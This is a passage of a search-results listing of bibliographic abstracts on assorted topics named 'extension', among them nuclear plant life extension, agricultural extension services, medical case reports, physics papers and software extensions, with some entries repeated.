appeared as a large biconvex mass, which showed iso or slightly low density homogeneously and had gross calcification in the posterior rim. The findings of the paranasal sinuses and the orbit in tomograms and CT scans are thought to be useful in the differential diagnosis of chronic subdural hematoma. 10. Applications and extensions of degradation modeling International Nuclear Information System (INIS) Hsu, F.; Subudhi, M.; Samanta, P.K.; Vesely, W.E. 1991-01-01 Component degradation modeling being developed to understand the aging process can have many applications with potential advantages. Previous work has focused on developing the basic concepts and mathematical development of a simple degradation model. Using this simple model, times of degradations and failures occurrences were analyzed for standby components to detect indications of aging and to infer the effectiveness of maintenance in preventing age-related degradations from transforming to failures. Degradation modeling approaches can have broader applications in aging studies and in this paper, we discuss some of the extensions and applications of degradation modeling. The application and extension of degradation modeling approaches, presented in this paper, cover two aspects: (1) application to a continuously operating component, and (2) extension of the approach to analyze degradation-failure rate relationship. The application of the modeling approach to a continuously operating component (namely, air compressors) shows the usefulness of this approach in studying aging effects and the role of maintenance in this type component. In this case, aging effects in air compressors are demonstrated by the increase in both the degradation and failure rate and the faster increase in the failure rate compared to the degradation rate shows the ineffectiveness of the existing maintenance practices. Degradation-failure rate relationship was analyzed using data from residual heat removal system pumps. A simple linear model with a time-lag between these two parameters was studied. The application in this case showed a time-lag of 2 years for degradations to affect failure occurrences. 2 refs 11. Applications and extensions of degradation modeling Energy Technology Data Exchange (ETDEWEB) Hsu, F.; Subudhi, M.; Samanta, P.K. [Brookhaven National Lab., Upton, NY (United States); Vesely, W.E. [Science Applications International Corp., Columbus, OH (United States) 1991-12-31 Component degradation modeling being developed to understand the aging process can have many applications with potential advantages. Previous work has focused on developing the basic concepts and mathematical development of a simple degradation model. Using this simple model, times of degradations and failures occurrences were analyzed for standby components to detect indications of aging and to infer the effectiveness of maintenance in preventing age-related degradations from transforming to failures. Degradation modeling approaches can have broader applications in aging studies and in this paper, we discuss some of the extensions and applications of degradation modeling. The application and extension of degradation modeling approaches, presented in this paper, cover two aspects: (1) application to a continuously operating component, and (2) extension of the approach to analyze degradation-failure rate relationship. The application of the modeling approach to a continuously operating component (namely, air compressors) shows the usefulness of this approach in studying aging effects and the role of maintenance in this type component. In this case, aging effects in air compressors are demonstrated by the increase in both the degradation and failure rate and the faster increase in the failure rate compared to the degradation rate shows the ineffectiveness of the existing maintenance practices. Degradation-failure rate relationship was analyzed using data from residual heat removal system pumps. A simple linear model with a time-lag between these two parameters was studied. The application in this case showed a time-lag of 2 years for degradations to affect failure occurrences. 2 refs. 12. Applications and extensions of degradation modeling Energy Technology Data Exchange (ETDEWEB) Hsu, F.; Subudhi, M.; Samanta, P.K. (Brookhaven National Lab., Upton, NY (United States)); Vesely, W.E. (Science Applications International Corp., Columbus, OH (United States)) 1991-01-01 Component degradation modeling being developed to understand the aging process can have many applications with potential advantages. Previous work has focused on developing the basic concepts and mathematical development of a simple degradation model. Using this simple model, times of degradations and failures occurrences were analyzed for standby components to detect indications of aging and to infer the effectiveness of maintenance in preventing age-related degradations from transforming to failures. Degradation modeling approaches can have broader applications in aging studies and in this paper, we discuss some of the extensions and applications of degradation modeling. The application and extension of degradation modeling approaches, presented in this paper, cover two aspects: (1) application to a continuously operating component, and (2) extension of the approach to analyze degradation-failure rate relationship. The application of the modeling approach to a continuously operating component (namely, air compressors) shows the usefulness of this approach in studying aging effects and the role of maintenance in this type component. In this case, aging effects in air compressors are demonstrated by the increase in both the degradation and failure rate and the faster increase in the failure rate compared to the degradation rate shows the ineffectiveness of the existing maintenance practices. Degradation-failure rate relationship was analyzed using data from residual heat removal system pumps. A simple linear model with a time-lag between these two parameters was studied. The application in this case showed a time-lag of 2 years for degradations to affect failure occurrences. 2 refs. 13. Extension of life of nuclear power stations International Nuclear Information System (INIS) Takahashi, Hideaki 1991-01-01 At the time of designing nuclear power stations, as their service life, generally 40 years are taken, and the basic design specifications of machinery and equipment are determined. In USA where atomic energy has been developed, the new construction of nuclear power stations is cased for a while, however, if this situation continues as it is, since old power stations reach the service life of 40 years and are retired in near future, it is feared that the circumstance of the total amount of power generation becoming short will occur. As one of the countermeasures to this, the research on the extension of life of nuclear power stations has been carried out in many fields in USA, and it is expected that the application for extending the life for the power stations constructed in the initial period of development is submitted in 1991. The researches that have been carried out for solving the technical problems in this extension of life and the situation in Japan are reported. The NEC of USA decided that the operation period of nuclear power stations in USA, which is considered to be 40 years so far, can be extended up to the limit of 20 years. The background and circumstances of this problem in USA, Nuclear Plant Aging Research Program, Plant Life Extension Program and so on are reported. (K.I.) 14. The programs for lifetime extension by AREVA International Nuclear Information System (INIS) Knoche, P. 2014-01-01 In 2011 AREVA launched 2 worldwide programs to meet the demands of its customers: 'AREVA Safety Alliance' that proposes a set of measures for post-Fukushima safety upgrading and 'AREVA Forward Alliance' that is dedicated to lifetime extension projects. Concerning 'AREVA Safety Alliance' about 150 projects have been carried out for 53 customers in 19 countries, as for 'AREVA Forward Alliance' 60% of the lifetime extension projects in the US have been performed by AREVA. In the framework of lifetime extension projects, upgrading measures and services are proposed such as the installation of hydrogen recombiner units, of filtered ventilation systems for severe accidents, or the upgrading of the reactor control system through the implementation of the digital Teleperm XS technology, or recommendations about the methodology to follow for the repair or replacement of important components. The replacement of steam generators and of the pressurizer and with other upgrading works led to a gain of 18.5% on the output power of the Ringhals-4 unit. (A.C.) 15. LIMB Demonstration Project Extension and Coolside Demonstration Energy Technology Data Exchange (ETDEWEB) Goots, T.R.; DePero, M.J.; Nolan, P.S. 1992-11-10 This report presents results from the limestone Injection Multistage Burner (LIMB) Demonstration Project Extension. LIMB is a furnace sorbent injection technology designed for the reduction of sulfur dioxide (SO[sub 2]) and nitrogen oxides (NO[sub x]) emissions from coal-fired utility boilers. The testing was conducted on the 105 Mwe, coal-fired, Unit 4 boiler at Ohio Edison's Edgewater Station in Lorain, Ohio. In addition to the LIMB Extension activities, the overall project included demonstration of the Coolside process for S0[sub 2] removal for which a separate report has been issued. The primary purpose of the DOE LIMB Extension testing, was to demonstrate the generic applicability of LIMB technology. The program sought to characterize the S0[sub 2] emissions that result when various calcium-based sorbents are injected into the furnace, while burning coals having sulfur content ranging from 1.6 to 3.8 weight percent. The four sorbents used included calcitic limestone, dolomitic hydrated lime, calcitic hydrated lime, and calcitic hydrated lime with a small amount of added calcium lignosulfonate. The results include those obtained for the various coal/sorbent combinations and the effects of the LIMB process on boiler and plant operations. 16. EXTENSION EDUCATION SYMPOSIUM: Getting the most out of your extension appointment and still having a life. Science.gov (United States) Powers, W; Cockett, N; Lardy, G 2017-04-01 Managing the demands of an academic appointment in extension can be a challenging task. Demands from constituent groups, expectations of supervisors, and rigors of promotion and tenure processes can create pressures that young faculty did not expect. Throw in spousal and family duties and you have created a situation that many will find hard to navigate. However, there are ways to cope and, even better news, there are ways to excel in meeting the demands of an academic appointment and enjoying life. Because many new extension faculty members do not have prior experience in extension, best practices in documenting programs and extension scholarship over the pretenure period are provided in this paper. Appointments that include both research and extension are quite common at many land grant universities. The advantages of joint appointments are numerous and include the fact that more and more grant agencies are seeking integrated research, teaching, and/or extension projects. However, the time demands of joint appointments can be challenging. Joint appointments can be designed to help faculty members conduct important translational research and have it be applied in a production setting. By seeking commonalities in research and extension efforts, joint appointments can be very synergistic. Development of highly successful programs requires planning on the front end with an emphasis on an in-depth needs assessment to determine stakeholder needs for both research and extension. Impact assessment should be part of this planning effort. Performing as a successful extension faculty member while maintaining relationships outside of work is challenging and requires deliberate effort on the part of employees and supervisors to realize there is more to life than work. Some authors have referred to this as work-life balance, but it may be more helpful to think of it as work-life effectiveness. To do this, one needs to 1) define what success looks like, 2) set boundaries and 17. Electron beam radiotherapy for the management of recurrent extensive ocular surface squamous neoplasia with orbital extension OpenAIRE Ramesh Murthy; Himika Gupta; Rahul Krishnatry; Siddhartha Laskar 2015-01-01 Recurrent extensive ocular surface squamous neoplasia (OSSN) with orbital invasion can be successfully managed with external radiotherapy using electrons resulting in eye and vision salvage. We report a case of right eye recurrent OSSN in an immunocompetent adult Indian male, with extensive orbital involvement. The patient had two previous surgical excisions with recurrent disease. At this stage, conventionally exenteration is considered the treatment modality. However, he was treated with 50... 18. Supervisory skills of extension managers in Sekhukhune District of ... African Journals Online (AJOL) ... namely at the supervisory level (Sub-District Extension Coordinators) and the top extension management level (Extension Heads). These are the two management levels that can potentially have the biggest influence on the efficiency of extension delivery. Keywords: management, leadership skills, differential perception, ... 19. A Comparison of Agricultural Extension in Five States. Science.gov (United States) Rogers, Everett M. The nature of the Cooperative Extension Service in agriculture was examined to identify aspects that could be applied to the design of an educational extension service. To learn about the organization, programs, and priorities of Cooperative Extension, employees of the state extension services in California, Colorado, New Mexico, New York, and… 20. Coping with changes in agricultural extension in Uganda and ... African Journals Online (AJOL) It is suggested that a national extension co-ordination organisation be formed, with the public extension system taking the lead, to co-ordinate extension activities until such a time when farmers' associations and other private organisations can take the lead in delivery and co-ordination of agricultural extension services in ... 1. Challenges for extension service to render efficient post-transformer ... African Journals Online (AJOL) LPhidza from Agricultural Extension to Rural Development and Agricultural Extension. This was soon after they appointed a new Head of Extension who had just returned with a PhD from. Pretoria University. Makerere University in Uganda changed their Bachelor of Agricultural. Extension and Education (BAEE) program to Bachelor ... 2. Expanding Agricultural and Rural Extension Roles for Sustainable ... African Journals Online (AJOL) The effect of globalization and the attendant privatization of the public sector of national economies of developing nations has profound effect on extension service delivery. This paper reviews present concept and challenges of extension and proposes future concerns of extension service. It concludes that extension ... 3. Job satisfaction of extension workers in Edo State Agricultural ... African Journals Online (AJOL) ... of extension agents so as to be abreast of new developments, improve their knowledge and skills in new extension methodologies. With this, extension agents will be motivated and be satisfied with their jobs. Keywords: job satisfaction, extension workers. International Journal of Agriculture and Rural Development Vol. 4. Suggesting a new paradigm for agricultural extension policy: the ... African Journals Online (AJOL) In terms of approaches and functions, the study found that public sector extension in West Africa is undergoing transformation including decentralization and outsourcing extension services in the context of adopting a pluralistic system of extension delivery. While up to six models of extension are a commonly applied in the ... 5. Extension of operational limits on EAST International Nuclear Information System (INIS) Gao Xiang; Li Jiangang; Wan Baonian; Zhao Junyu; Hu Liqun; Liu Haiqing; Jie Yinxian; Xu Qiang; Wu Zhenwei; Yang Yu; Gong Xianzu; Shen Biao; Hu Jiansheng; Shi Yuejiang; Ling Bili; Wang Jun; Sajjad, S.; Zang Qing; Gao Wei; Zhang Tao; Yu Yaowei; Yang Yao; Han Xiaofeng; Shi Nan; Ming Tingfeng; Ti Ang; Zhang Wenyang; Xu Guosheng; Chen Junling; Luo Guangnan; Zhang Xiaodong; Mao Jianshan; Wan Yuanxi 2007-01-01 The first plasma has been achieved successfully in the Experimental Advanced Superconducting Tokamak (EAST). Boronization by the glow discharge (GDC) method was studied in experiments. The plasma performance was obviously improved by GDC boronization. Extension of the operational region and improvement in the plasma performance were obtained. Sawtooth discharges were observed by means of soft x-ray signals, electron cyclotron emission signals and line averaged electron density after boronization. Lower q a and more stable operation were also achieved following GDC boronization. The plasma current ramp-up rate was also improved as a result of decreased impurity content and low averaged loop voltage due to boronization 6. Extension of p-local finite groups OpenAIRE Broto, Carles; Castellana, Natalia; Grodal, Jesper; Levi, Ran; Oliver, Bob 2005-01-01 A p-local finite group consists of a finite p-group S, together with a pair of categories which encode conjugacy'' relations among subgroups of S, and which are modelled on the fusion in a Sylow p-subgroup of a finite group. It contains enough information to define a classifying space which has many of the same properties as p-completed classifying spaces of finite groups. In this paper, we study and classify extensions of p-local finite groups, and also compute the fundamental group of the... 7. Extensive Epidermoid Cyst and Breathing Difficulty Directory of Open Access Journals (Sweden) Ciro Dantas Soares 2015-01-01 Full Text Available Epidermoid cysts are common cystic lesions in the skin, ovaries, and testicles, but their occurrence in the oral cavity is uncommon. They consist of cysts delimited by a fibrous capsule without cutaneous annexes and are lined by stratified squamous epithelium. The differential diagnosis includes ranula, dermoid cysts, and lingual thyroid. Despite their benign presentation, these cysts can cause functional limitations, requiring special clinical attention for extensive lesions located in regions that preserve vital structures. This paper aims to report a case of epidermoid cyst in patient with swallowing and breathing difficulty, highlighting the clinical and surgical planning. 8. Emergency Anaesthetic Management of Extensive Thoracic Trauma Directory of Open Access Journals (Sweden) H C Chandola 2007-01-01 Full Text Available High speed vehicles, drug abuse, alcohol and easy availability of handguns are the main reasons of increasing number of trauma especially thoracic trauma. Anaesthesiologist plays an important role in the management of extensive thoracic trauma. Thoracic trauma, penetrating or blunt, may cause damage to organs suspended in thorax viz. pleura, lungs, heart, great vessels, trachea and oesophagus. It may lead to pneumothorax, cardiac tamponade or life threatening haemorrhage. With aggressive care and management of these factors, majority of patients can survive and return to normal life. 9. Extensive utilization of training reactor VR-1 International Nuclear Information System (INIS) Karel, Matejka; Lubomir, Sklenka 2005-01-01 This paper describes one of the main purposes of the VR-1 training reactor utilisation - i.e. extensive educational programme. The educational programme is intended for the training of university students (all technical universities in Czech Republic) and selected nuclear power plant personnel. At the present, students can go through more than 20 different experimental exercises. An attractive programme including demonstration of reactor operation is prepared also for high school students. Moreover, research and development works and information programmes proceed at the VR-1 reactor as well 10. Analytic extension of the nuclear algebraic potential Energy Technology Data Exchange (ETDEWEB) Lichtenthaeler, R. (Departamento de Fisica Nuclear, Laboratorio do Pelletron, Universidade de Sao Paulo, Caixa Postal 20516, 01452-990 Sao Paulo, Sao Paulo (Brazil)); Gomes, L.C. (Grupo de Fisica Nuclear Teorica e Fenomenologia de Particulas Elementares Instituto de Fisica Universidade de Sao Paulo, Caixa Postal 20516, 01498-970 Sao Paulo, Sao Paulo (Brazil)) 1994-12-01 An analytic extension of the nuclear algebraic potential in the complex energy and angular momentum planes is discussed and an approximation for the algebraic potential in agreement with the known analytic properties of the [ital S]-matrix is proposed. The invariance of the energy spectrum of the Coulomb part of the interaction is established. The results are applied to the Regge pole analysis of the [sup 12]C+[sup 24]Mg elastic collision at [ital E][sub [ital l][ital a][ital b 11. CT of perineural tumor extension: pterygopalatine fossa Energy Technology Data Exchange (ETDEWEB) Curtin, H.D.; Williams, R.; Johnson, J. 1985-01-01 Tumors of the oral cavity and paranasal sinuses can spread along nerves to areas apparently removed from the primary tumor. In tumors of the palate, sinuses, and face, this perineural spread usually involves the maxillary division of the trigeminal nerve. The pterygopalatine fossa is a pathway of the maxillary nerve and becomes a key landmark in the detection of neural metastasis by computed tomography (CT). Obliteration of the fat in the fossa suggests pathology. Case material illustrating neural extension is presented and the CT findings are described. 12. Radar reflection off extensive air showers Directory of Open Access Journals (Sweden) Werner F. 2013-06-01 Full Text Available We investigate the possibility of detecting extensive air showers by the radar technique. Considering a bistatic radar system and different shower geometries, we simulate reflection of radio waves off the static plasma produced by the shower in the air. Using the Thomson cross-section for radio wave reflection, we obtain the time evolution of the signal received by the antennas. The frequency upshift of the radar echo and the power received are studied to verify the feasibility of the radar detection technique. 13. Radio detection of extensive air showers Science.gov (United States) Huege, Tim 2017-12-01 Radio detection of extensive air showers initiated in the Earth's atmosphere has made tremendous progress in the last decade. Today, radio detection is routinely used in several cosmic-ray observatories. The physics of the radio emission in air showers is well-understood, and analysis techniques have been developed to determine the arrival direction, the energy and an estimate for the mass of the primary particle from the radio measurements. The achieved resolutions are competitive with those of more traditional techniques. In this article, I shortly review the most important achievements and discuss the potential for future applications. 14. Shift versus Extension in Refined Partition Functions CERN Document Server Krefl, Daniel 2010-01-01 We have recently shown that the global behavior of the partition function of N=2 gauge theory in the general Omega-background is captured by special geometry in the guise of the (extended) holomorphic anomaly equation. We here analyze the fate of our results under the shift of the mass parameters of the gauge theory. The preferred value of the shift, noted previously in other contexts, restores the Z_2 symmetry of the instanton partition function under inversion of the Omega-background, and removes the extension. We comment on various connections. 15. A Practice of English Extensive Reading OpenAIRE Yasuko, Yoshino; Tatsuhiko, Nagasaka; Ryuji, Fujikami; Andrew, Jones 2012-01-01 The Foreign Language Center(FLC)of Jissen Women's University offers an Integrated English course required for the first-year students. The aim of this course is to enhance motivation for the students to acquire English and help the students to be autonomous learners. On a trial basis, a practice of English extensive reading project was adopted in 2006 and has been improved year by year. The reason whywe focused on reading was that reading is both a thinking process and a productiveactivity. I... 16. Extension planning for electrical energy supply systems International Nuclear Information System (INIS) Bieselt, R. 1975-01-01 In the future as well as in the past, and in particular in the next decade a considerable increase in electrical energy demand can be expected. To satisfy this demand in a reliable and sufficient manner will force the utilities to invest large sums of money for the operation and the extension of power generation and distribution plants. The size of these investments justifies the search for more and more comprehensive and at the same time more detailed planning methods. With the help of system analysis a planning model for the electricity supply industry of a major supply area will be designed. (orig./RW) [de 17. Extensive Variation in Chromatin States Across Humans KAUST Repository Kasowski, M. 2013-10-17 The majority of disease-associated variants lie outside protein-coding regions, suggesting a link between variation in regulatory regions and disease predisposition. We studied differences in chromatin states using five histone modifications, cohesin, and CTCF in lymphoblastoid lines from 19 individuals of diverse ancestry. We found extensive signal variation in regulatory regions, which often switch between active and repressed states across individuals. Enhancer activity is particularly diverse among individuals, whereas gene expression remains relatively stable. Chromatin variability shows genetic inheritance in trios, correlates with genetic variation and population divergence, and is associated with disruptions of transcription factor binding motifs. Overall, our results provide insights into chromatin variation among humans. 18. Extensive spinal epidural abscess complicated with hydrocephalus Directory of Open Access Journals (Sweden) Balan Corneliu 2015-12-01 Full Text Available Spinal epidural abscess is a rare but severe infection requiring prompt recognition in order to have a favorable outcome and appropriate treatment, mainly surgical. We present one of the largest extensions of such abscess in literature, involving the whole spine. No surgical treatment was tempted due to the involvement of 19 levels but antibiotics. The evolution of the lesion was complicated with hydrocephalus, by mechanism of cervical block of CSF flow, and needed first external derivation and later ventriculo-peritoneal drainage. 19. Effective, Efficient Online Training in Cooperative Extension Directory of Open Access Journals (Sweden) Jane Chin Young 2014-09-01 Full Text Available In order to keep pace with media and communications trends in education, Cooperative Extension (CE faces the need to shift from traditional face-to-face delivery to online alternatives. This exploratory study focused on evaluating the effectiveness of on-demand, interactive online training compared to its face-to-face counterpart. Targeted for CE staff and volunteers whose work impacts youth, families and communities, the design centered on the university’s cost-effective in-house technology tools. The study results make the case for online delivery as effective and efficient. Strategies for developing a process for online delivery in CE are also offered. 20. A PARALLEL EXTENSION OF THE UAL ENVIRONMENT International Nuclear Information System (INIS) MALITSKY, N.; SHISHLO, A. 2001-01-01 The deployment of the Unified Accelerator Library (UAL) environment on the parallel cluster is presented. The approach is based on the Message-Passing Interface (MPI) library and the Perl adapter that allows one to control and mix together the existing conventional UAL components with the new MPI-based parallel extensions. In the paper, we provide timing results and describe the application of the new environment to the SNS Ring complex beam dynamics studies, particularly, simulations of several physical effects, such as space charge, field errors, fringe fields, and others 1. A PARALLEL EXTENSION OF THE UAL ENVIRONMENT. Energy Technology Data Exchange (ETDEWEB) MALITSKY, N.; SHISHLO, A. 2001-06-18 The deployment of the Unified Accelerator Library (UAL) environment on the parallel cluster is presented. The approach is based on the Message-Passing Interface (MPI) library and the Perl adapter that allows one to control and mix together the existing conventional UAL components with the new MPI-based parallel extensions. In the paper, we provide timing results and describe the application of the new environment to the SNS Ring complex beam dynamics studies, particularly, simulations of several physical effects, such as space charge, field errors, fringe fields, and others. 2. Improved Extension Neural Network and Its Applications Directory of Open Access Journals (Sweden) Yu Zhou 2014-01-01 Full Text Available Extension neural network (ENN is a new neural network that is a combination of extension theory and artificial neural network (ANN. The learning algorithm of ENN is based on supervised learning algorithm. One of important issues in the field of classification and recognition of ENN is how to achieve the best possible classifier with a small number of labeled training data. Training data selection is an effective approach to solve this issue. In this work, in order to improve the supervised learning performance and expand the engineering application range of ENN, we use a novel data selection method based on shadowed sets to refine the training data set of ENN. Firstly, we use clustering algorithm to label the data and induce shadowed sets. Then, in the framework of shadowed sets, the samples located around each cluster centers (core data and the borders between clusters (boundary data are selected as training data. Lastly, we use selected data to train ENN. Compared with traditional ENN, the proposed improved ENN (IENN has a better performance. Moreover, IENN is independent of the supervised learning algorithms and initial labeled data. Experimental results verify the effectiveness and applicability of our proposed work. 3. Dynamic extension and configuration of multimedia terminals Science.gov (United States) Schaefer, Ralf; Finger, Ulrich 1999-01-01 In this paper, we present an implementation of an MPEG-4 decoder using Java for dynamic processing, i.e. providing flexibility and extensibility. The advantage of Java is its platform independent paradigm using a virtual machine. This enables us to provide downloading of tools and also dynamic configuration of already downloaded tools. However, the disadvantage of Java is its low performance. Therefore we propose a hybrid implemented approach using Java implementations only for flexibility and extensibility. All the rest of the decoder is implemented in native code, providing the high performance necessary for real time issues. We use Java only where Java is necessary. To integrate Java with the native code implementations we utilize the Java native interface (JNI). We use the JNI to create an instance of the Java virtual machine (JVM) in the running MPEG-4 application. This JVM instance handles all Java decoder tool implementations as well as incoming Java bit streams. All the other data streams are handled by the native implemented part. 4. Radial Extension, Prototypicality, and Tectonic Equivalence Directory of Open Access Journals (Sweden) Shaver Stephen R. 2018-01-01 Full Text Available In his book “Without Metaphor, No Saving God: Theology After Cognitive Linguistics”, Robert Masson describes a metaphoric process by which newly accepted truths emerge: for example, in the assertion “Jesus is the Messiah,” Christians reconfigure the field of meanings associated with an existing concept from the Hebrew scriptures (messiah by asserting its identification with Jesus. Masson dubs this process a “tectonic equivalence” or “tectonic shift.” In this paper I build on Masson‘s work by examining some of the shifts he describes as tectonic through the lens of the cognitive linguistics concepts of radial extension and polysemy. I propose that a lasting tectonic shift may be understood as a blend creating a radial extension that substantially alters the category structure of the original source frame so that the blended space comes to be understood as a central instance of that category. Such an approach allows a fruitful analysis of the similarities and differences among three example blends: god is a rock, jesus is the messiah, and jesus is god. 5. Life extension by calorie restriction in humans. Science.gov (United States) Everitt, Arthur V; Le Couteur, David G 2007-10-01 Long-term reduction in energy intake in the diet (calorie restriction [CR]) extends the life of the laboratory rat by about 25%. However, in humans there are no life-long studies of CR, but only short-term trials which indicate that 20% CR acting over periods of 2-6 years is associated with reduced body weight, blood pressure, blood cholesterol, and blood glucose--risk factors for the major killer diseases of cardiovascular disease and diabetes. In addition, recent research has shown that CR for 6 months is able to improve biomarkers for longevity (deep body temperature and plasma insulin) and thus should increase life expectancy. The magnitude of the life-extension effect of CR in humans can only be estimated. The Okinawans, the longest-lived people on earth, consume 40% fewer calories than the Americans and live only 4 years longer. Similarly, women in United States consume 25% fewer calories than men and live 5 years longer. From the survival studies of overweight and obese people, it is estimated that long-term CR to prevent excessive weight gain could add only 3-13 years to life expectancy. Thus the effects of CR on human life extension are probably much smaller than those achieved by medical and public health interventions, which have extended life by about 30 years in developed countries in the 20th century, by greatly reducing deaths from infections, accidents, and cardiovascular disease. 6. [Extensive swelling reaction after a pentavalent vaccination]. Science.gov (United States) Gébus, M; Barbier, C; Bost-Bru, C; Michard-Lenoir, A P; Plantaz, D 2015-09-01 Injection site reactions (ISRs) are quite common side effects defined by a local adverse drug reaction directly caused by a vaccine. Twenty-four hours after an intramuscular injection (in the deltoid muscle) of the diphtheria, tetanus, acellular pertussis, inactivated poliomyelitis, Haemophilus influenza type b (DTPCa-Hib) combined vaccine, a 3-year-old boy developed fever. A few hours later, local redness and swelling appeared at the injection site, with rapid extension to the entire limb, it was pain-free, and no other clinical anomalies were present. The patient received intravenous antibiotics for suspected cellulitis. The progression was favorable in 12h (apyrexia and decreased limb swelling), allowing the intravenous antibiotic treatment to be discontinued. Since the child was in excellent general health and recovery was fast, an ISR was diagnosed. Extensive limb swelling is frequent, mostly after the fourth dose of DTPCa-Hib. Deltoid muscle injection of DTP vaccine increases the risk of ISR compared to injection in the thigh, before the age of 3 years. The introduction of acellular pertussis vaccine decreased the risk of general side effects but may increase the risk of ISR. These reactions disappear with symptomatic treatment and do not contraindicate the product. Copyright © 2015 Elsevier Masson SAS. All rights reserved. 7. Extensive Growth of an Anaplastic Meningioma Directory of Open Access Journals (Sweden) Hajrullah Ahmeti 2013-01-01 Full Text Available We present the case of a 30-year-old male patient with an almost complete destruction of the calvarial bone through an anaplastic meningioma diagnosed in line with dizziness. Neuroimaging revealed an extensive growing, contrast enhancing lesion expanding at the supra- and infratentorial convexity, infiltrating and destroying large parts of the skull, and infiltrating the skin. Due to progressive ataxia and dysarthria with proven tumor growth in the posterior fossa in the continuing course, parts of the tumor were resected. A surgical procedure with the aim of complete tumor resection in a curative manner was not possible. Six months after the first operation, due to a new tumor progression, most extensive tumor resection was performed. Due to the aggressive and destructive growth with a high rate of recurrence and tendency of metastases, anaplastic meningiomas can be termed as malignant tumors. The extrinsic growth masks the tumor until they reach a size, which makes these tumors almost unresectable. In the best case scenarios, the five-year survival is about 50%. With the presented case, we would like to show the aggressive behavior of anaplastic meningiomas in a very illustrative way. Chemotherapy, radiotherapy, and surgery reach their limits in this tumor entity. 8. Microcanonical ensemble extensive thermodynamics of Tsallis statistics International Nuclear Information System (INIS) Parvan, A.S. 2005-01-01 The microscopic foundation of the generalized equilibrium statistical mechanics based on the Tsallis entropy is given by using the Gibbs idea of statistical ensembles of the classical and quantum mechanics.The equilibrium distribution functions are derived by the thermodynamic method based upon the use of the fundamental equation of thermodynamics and the statistical definition of the functions of the state of the system. It is shown that if the entropic index ξ = 1/q - 1 in the microcanonical ensemble is an extensive variable of the state of the system, then in the thermodynamic limit z bar = 1/(q - 1)N = const the principle of additivity and the zero law of thermodynamics are satisfied. In particular, the Tsallis entropy of the system is extensive and the temperature is intensive. Thus, the Tsallis statistics completely satisfies all the postulates of the equilibrium thermodynamics. Moreover, evaluation of the thermodynamic identities in the microcanonical ensemble is provided by the Euler theorem. The principle of additivity and the Euler theorem are explicitly proved by using the illustration of the classical microcanonical ideal gas in the thermodynamic limit 9. Microcanonical ensemble extensive thermodynamics of Tsallis statistics International Nuclear Information System (INIS) Parvan, A.S. 2006-01-01 The microscopic foundation of the generalized equilibrium statistical mechanics based on the Tsallis entropy is given by using the Gibbs idea of statistical ensembles of the classical and quantum mechanics. The equilibrium distribution functions are derived by the thermodynamic method based upon the use of the fundamental equation of thermodynamics and the statistical definition of the functions of the state of the system. It is shown that if the entropic index ξ=1/(q-1) in the microcanonical ensemble is an extensive variable of the state of the system, then in the thermodynamic limit z-bar =1/(q-1)N=const the principle of additivity and the zero law of thermodynamics are satisfied. In particular, the Tsallis entropy of the system is extensive and the temperature is intensive. Thus, the Tsallis statistics completely satisfies all the postulates of the equilibrium thermodynamics. Moreover, evaluation of the thermodynamic identities in the microcanonical ensemble is provided by the Euler theorem. The principle of additivity and the Euler theorem are explicitly proved by using the illustration of the classical microcanonical ideal gas in the thermodynamic limit 10. Extension of yeast chronological lifespan by methylamine. Directory of Open Access Journals (Sweden) Sanjeev Kumar Full Text Available BACKGROUND: Chronological aging of yeast cells is commonly used as a model for aging of human post-mitotic cells. The yeast Saccharomyces cerevisiae grown on glucose in the presence of ammonium sulphate is mainly used in yeast aging research. We have analyzed chronological aging of the yeast Hansenula polymorpha grown at conditions that require primary peroxisome metabolism for growth. METHODOLOGY/PRINCIPAL FINDINGS: The chronological lifespan of H. polymorpha is strongly enhanced when cells are grown on methanol or ethanol, metabolized by peroxisome enzymes, relative to growth on glucose that does not require peroxisomes. The short lifespan of H. polymorpha on glucose is mainly due to medium acidification, whereas most likely ROS do not play an important role. Growth of cells on methanol/methylamine instead of methanol/ammonium sulphate resulted in further lifespan enhancement. This was unrelated to medium acidification. We show that oxidation of methylamine by peroxisomal amine oxidase at carbon starvation conditions is responsible for lifespan extension. The methylamine oxidation product formaldehyde is further oxidized resulting in NADH generation, which contributes to increased ATP generation and reduction of ROS levels in the stationary phase. CONCLUSION/SIGNIFICANCE: We conclude that primary peroxisome metabolism enhanced chronological lifespan of H. polymorpha. Moreover, the possibility to generate NADH at carbon starvation conditions by an organic nitrogen source supports further extension of the lifespan of the cell. Consequently, the interpretation of CLS analyses in yeast should include possible effects on the energy status of the cell. 11. Extension of association models to complex chemicals DEFF Research Database (Denmark) Avlund, Ane Søgaard ; CPA and sPC-SAFT. Phase equilibrium and monomer fraction calculations with sPC-SAFT for methanol are used in the thesis to illustrate the importance of parameter estimation when using SAFT. Different parameter sets give similar pure component vapor pressure and liquid density results, whereas very......Summary of “Extension of association models to complex chemicals”. Ph.D. thesis by Ane Søgaard Avlund The subject of this thesis is application of SAFT type equations of state (EoS). Accurate and predictive thermodynamic models are important in many industries including the petroleum industry...... not account for steric self-hindrance for tree-like structures. An important practical problem is how to obtain optimal and consistent parameters. Moreover, multifunctional associating molecules represent a special challenge. In this work two equations of state using the SAFT theory for association are used... 12. A Moodle extension to book online labs Directory of Open Access Journals (Sweden) Antonio C. Cardoso 2005-11-01 Full Text Available The social constructivist philosophy of Moodle makes it an excellent choice to deliver e-learning contents that require collaborative activities, such as those that are associated with online labs. In the case of online labs that enable web access to real devices (remote workbenches, access time should be reserved beforehand. A booking tool will avoid access conflicts and at the same time will help the students to organise their time and activities. This paper presents a Moodle extension that was developed within the Leonardo da Vinci MARVEL project, with the objective of meeting this requirement. The booking tool presented enables resource sharing in general and may be used to organise access to any type of scarce resources, such as to online labs and to the videoconferencing rooms that are needed to support collaborative activities. 13. BB-CLIPS: Blackboard extensions to CLIPS Science.gov (United States) Orchard, Robert A.; Diaz, Aurora C. 1990-01-01 This paper describes a set of extensions made to CLIPS version 4.3 that provide capabilities similar to the blackboard control architecture described by Hayes-Roth. There are three types of additions made to the CLIPS shell. The first extends the syntax to allow the specification of blackboard locations for CLIPS facts. The second implements changes in CLIPS rules and the agenda manager that provide some of the powerful features of the blackboard control architecture. These additions provide dynamic prioritization of rules on the agenda allowing control strategies to be implemented that respond to the changing goals of the system. The final category of changes support the needs of continuous systems, including the ability for CLIPS to continue execution with an empty agenda. 14. Requirement Generation For The Habitation Extension Module Science.gov (United States) Hempsell, M. As part of a debate within United Kingdom regarding its policy to avoid project involving human space flight, a study design was produced to explore the implications of a late entry as a full partner in the International Space Station (ISS). This objective generates many diverse requirements from the two primary stakeholders, the existing ISS partners and United Kingdom itself. It was found that a Soyuz/Fregat launched Habitation Extension Module with a logistic supply capability could meet all these requirements. 